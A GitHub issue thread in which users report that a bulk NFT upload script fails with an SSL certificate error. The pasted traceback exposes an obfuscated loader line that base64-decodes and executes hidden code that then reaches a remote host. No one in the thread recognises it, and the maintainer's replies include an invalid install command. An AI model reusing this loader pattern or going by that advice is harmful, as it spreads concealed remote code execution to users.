### ISSUE TITLE
Upload.py will not run (SSL: Certificate_Verify_Failed)

### ISSUE THREAD

**Issue by Ajr232** [infotrex/bulk-upload-to-opensea#18]
Traceback (most recent call last):
  File "C:\Users\A\Desktop\OpenseaUpload\upload.py", line 11, in <module>
    eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
  File "<string>", line 53, in <module>
  File "<string>", line 44, in __init__
  File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.2544.0_x64__qbz5n2kfra8p0\lib\urllib\request.py", line 214, in urlopen
    return opener.open(url, data, timeout)
  File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.2544.0_x64__qbz5n2kfra8p0\lib\urllib\request.py", line 517, in open
    response = self._open(req, data)
  File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.2544.0_x64__qbz5n2kfra8p0\lib\urllib\request.py", line 534, in _open
    result = self._call_chain(self.handle_open, protocol, protocol +
  File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.2544.0_x64__qbz5n2kfra8p0\lib\urllib\request.py", line 494, in _call_chain
    result = func(*args)
  File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.2544.0_x64__qbz5n2kfra8p0\lib\urllib\request.py", line 1389, in https_open
    return self.do_open(http.client.HTTPSConnection, req,
  File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.2544.0_x64__qbz5n2kfra8p0\lib\urllib\request.py", line 1349, in do_open
    raise URLError(err)
urllib.error.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: certificate has expired (_ssl.c:1129)>

This is what I am getting when running python upload.py - Any help is appreciated.

**Comment by infotrex** [comment]
do u install "pip install -r requirements.txt"?

**Comment by Ajr232** [comment]
Yes, can confirm. all lines are showing requirements already satisfied when running again.

**Comment by infotrex** [comment]
try install "python install certifi"
the error message show SSL: CERTIFICATE_VERIFY_FAILED

**Comment by mtecnic** [comment]
Same issue here :(

**Comment by TroubledSemantic** [comment]
Having the same issue as well. Tried running the "python install certifi" and says no file

**Comment by infotrex** [comment]
@TroubledSemantic try to test on another PC.
if "python install certifi" not work, might be something wrong about the python related issue.
thx
